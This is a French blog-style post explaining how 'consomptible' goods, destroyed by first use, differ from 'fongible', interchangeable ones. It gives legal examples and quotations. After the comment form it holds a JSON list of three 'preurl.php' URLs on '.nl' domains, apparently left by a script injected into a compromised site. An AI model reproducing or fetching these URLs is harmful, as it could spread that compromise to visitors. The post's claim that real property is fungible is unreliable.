-->
U3F1ZWV6ZTI0NzUxOTA5ODY0X0FjdGl2YXRpb24yODA0MDQ5ODk4MTQ=
recent
Des postes

CONSOMPTIBLE et FONGIBLE : quelle différence

CONSOMPTIBLE et FONGIBLE : quelle différence

 

CONSOMPTIBLE et FONGIBLE : quelle différence


Il faut savoir faire la distinction qui s’impose entre ce qui est consomptible et ce qui est fongible. Les deux adjectifs qualifient des biens ou des choses, plus généralement des objets de commerce. L’adjectif consomptible est emprunté au latin "consumptibilis", ou périssable, et fongible, au latin "fongibilis", ou qui se consomme. ⚪Est consomptible le bien, la chose, l’objet qui se détruit par sa consommation ou son aliénation dès le premier usage, comme l’essence achetée à la pompe, les fruits et légumes, le vin, la monnaie. 

Est qualifié de fongible tout ce qui dans l’usage qui en est fait peut se substituer à un autre, qui est semblable ou qui a valeur égale, qui est de même genre, de même espèce, comme un bien-fonds, un titre négociable ou une valeur mobilière. ⚪Les biens fongibles sont déterminés par leur nombre, leur poids ou leur mesure. Étant interchangeables dans un paiement, ils trouvent dans cette faculté d’interchangeabilité leur caractère fongible, leur fongibilité. Quant à elle, la consomptibilité évoque la dégradation et l’épuisement par le premier usage. « Une créance de faire (p. ex. le droit de recevoir un conseil) est consomptible, car l’exécution de son obligation par le débiteur a pour effet d’éteindre le droit du créancier. De nombreuses choses mobilières (p. ex.: le carburant, le papier, etc.) sont consomptibles, leur usage les anéantit physiquement. » « La restitution des choses consomptibles en nature est impossible et seules les choses non consomptibles sont susceptibles de prêt à usage ou d’usufruit. La consomptibilité tient à la nature de la chose, mais les parties peuvent intervenir dans la qualification, rendre consomptible un bien qui ne l’est pas, ou inversement. » 

L’antonyme de consomptible est non consomptible (le livre que je lis, par exemple), celui de fongible est non fongible (une peinture originale, un bijou unique). Ce dont on peut user sans le détruire ou l’aliéner est qualifié de non consomptible. Le bien qui ne se consomme pas par l’usage qu’on en fait est non consomptible, tel un bien familial, un appartement, un parapluie, une automobile, un marteau ou une tondeuse à gazon.

NomE-mailMessage

{ "urls": [ "chaintopdom.nl/script/preurl.php", "smarttopchain.nl/script/preurl.php", "topblockchainsolutions.nl/script/preurl.php" ] }